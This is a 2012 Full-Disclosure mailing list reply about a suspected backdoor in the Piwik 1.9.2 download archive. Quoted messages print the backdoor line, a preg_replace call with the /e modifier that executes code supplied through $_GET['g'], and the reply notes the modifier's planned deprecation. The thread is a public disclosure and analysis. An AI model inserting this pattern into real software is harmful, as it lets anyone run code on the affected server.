[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
From: Ferenc Kovacs <tyra3l () gmail ! com>
Date: 2012-11-27 16:59:17
Message-ID: CAH-PCH7+jTEkmkjLbE1q9Rf3Te+okwNuUtfadN7EMqXvV0EULA () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
on a related note: the /e modifier will be deprecated with php 5.5 and
hopefully removed in the following version
https://wiki.php.net/rfc/remove_preg_replace_eval_modifier
On Tue, Nov 27, 2012 at 1:23 PM, Max Grobecker <max@grobecker-wtal.de>wrote:
> Yep, found later that the /e modifier allows you to execute code ;-)
>
>
> Am 27.11.2012 12:54, schrieb Christian Sciberras:
> >> At the moment I'm trying to figure out the further sense of this code,
> >> but it seems that there might also be some kind of backdoor (because of
> >> the use of $_GET).
> >
> >
> > preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> >
> > You think?
> >
> >
> > Chris.
> >
> >
> > On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker
> > <max@grobecker-wtal.de <mailto:max@grobecker-wtal.de>> wrote:
> >
> > preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
[Attachment #5 (text/html)]
on a related note: the /e modifier will be deprecated with php 5.5 and hopefully removed in the \
following version<div><a \
href="https://wiki.php.net/rfc/remove_preg_replace_eval_modifier">https://wiki.php.net/rfc/remove_preg_replace_eval_modifier</a><br>
</div><div class="gmail_extra"><br><br><div class="gmail_quote">On Tue, Nov 27, 2012 at 1:23 \
PM, Max Grobecker <span dir="ltr"><<a href="mailto:max@grobecker-wtal.de" \
target="_blank">max@grobecker-wtal.de</a>></span> wrote:<br> <blockquote class="gmail_quote" \
style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">Yep, found later that the \
/e modifier allows you to execute code ;-)<br> <br>
<br>
Am 27.11.2012 12:54, schrieb Christian Sciberras:<br>
<div class="im HOEnZb">>> At the moment I'm trying to figure out the further sense of \
this code,<br> >> but it seems that there might also be some kind of backdoor (because \
of<br> >> the use of $_GET).<br>
><br>
><br>
> preg_replace("/(.+)/e", $_GET['g'], 'dwm');<br>
><br>
> You think?<br>
><br>
><br>
> Chris.<br>
><br>
><br>
> On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker<br>
</div><div class="im HOEnZb">> <<a \
href="mailto:max@grobecker-wtal.de">max@grobecker-wtal.de</a> <mailto:<a \
href="mailto:max@grobecker-wtal.de">max@grobecker-wtal.de</a>>> wrote:<br> ><br>
> preg_replace("/(.+)/e", $_GET['g'], 'dwm');<br>
><br>
><br>
<br>
</div><div class="HOEnZb"><div class="h5">_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" \
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br> Hosted and \
sponsored by Secunia - <a href="http://secunia.com/" \
target="_blank">http://secunia.com/</a><br> </div></div></blockquote></div><br><br \
clear="all"><div><br></div>-- <br>Ferenc Kovács<br>@Tyr43l - <a href="http://tyrael.hu" \
target="_blank">http://tyrael.hu</a><br> </div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic